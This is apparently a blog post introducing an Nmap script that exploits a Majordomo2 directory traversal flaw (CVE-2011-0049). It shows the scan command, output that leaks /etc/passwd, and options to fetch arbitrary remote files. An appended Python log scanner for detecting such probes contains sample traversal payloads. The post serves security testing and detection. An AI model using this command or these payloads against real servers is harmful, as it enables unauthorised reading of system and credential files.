Exploiting Majordomo2 with Nmap


This is my Nmap script, http-majordomo2-dir-traversal. It exploits a directory traversal vulnerability in Majordomo2 (CVE-2011-0049). Update your Nmap repository to try it :)

Usage

nmap -p80 --script http-majordomo2-dir-traversal <host/ip>

Output

PORT   STATE SERVICE
80/tcp open  http    syn-ack
| http-majordomo2-dir-traversal: /etc/passwd was found:
|
| root:x:0:0:root:/root:/bin/bash
| bin:x:1:1:bin:/bin:/sbin/nologin

Arguments

  • http-majordomo2-dir-traversal.rfile – Remote file to download. Default: /etc/passwd
  • http-majordomo2-dir-traversal.uri – URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
  • http-majordomo2-dir-traversal.outfile – If set it saves the remote file to this location.


Official Documentation

http://nmap.org/nsedoc/scripts/http-majordomo2-dir-traversal.html

Download

http://nmap.org/svn/scripts/http-majordomo2-dir-traversal.nse
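
To check whether a server has already been probed this way, web access logs can be searched for requests to mj_wwwusr that carry traversal sequences. The following is an added example, not part of the NSE script or of Majordomo2: it assumes combined-format access logs and the default uri path listed above, and the log lines and the parameter name "param" are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Default value of the script's "uri" argument; change it if mj_wwwusr lives elsewhere.
MJ_PATH = "/cgi-bin/mj_wwwusr"
# Client address, request target and status code from a combined-format log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A ".." path segment delimited by slashes, backslashes or the ends of the value.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded sequences (%252e) are seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target):
    """Return (name, decoded value) pairs holding traversal in an mj_wwwusr request."""
    parts = urlsplit(target)
    if not fully_decode(parts.path).startswith(MJ_PATH):
        return []
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    decoded = [(name, fully_decode(value)) for name, value in pairs]
    return [(name, value) for name, value in decoded if TRAVERSAL_RE.search(value)]

def scan(lines):
    """Return (client ip, status, hits) for every log line worth reviewing."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m:
            hits = suspicious_params(m.group("target"))
            if hits:
                findings.append((m.group("ip"), int(m.group("status")), hits))
    return findings

# Constructed sample log lines (documentation addresses, placeholder parameter name).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2011:10:00:00 +0000] "GET /cgi-bin/mj_wwwusr?param=help HTTP/1.1" 200 512',
    '192.0.2.77 - - [01/Mar/2011:10:05:00 +0000] "GET /cgi-bin/mj_wwwusr?param=/../../../etc/passwd HTTP/1.1" 200 1843',
    '192.0.2.77 - - [01/Mar/2011:10:05:02 +0000] "GET /cgi-bin/mj_wwwusr?param=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1843',
    '192.0.2.77 - - [01/Mar/2011:10:05:04 +0000] "GET /index.html?x=../a HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, status, hits in scan(SAMPLE_LOG):
        print(ip, status, hits)
```

A hit that returned status 200 deserves priority, since the response may have contained the requested file.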



cat /etc/about-me

@calderpwn spends peaceful days in Cozumel, a beautiful island in the Caribbean, working on remote projects, learning new technologies, developing new tools, or simply enjoying the beach.
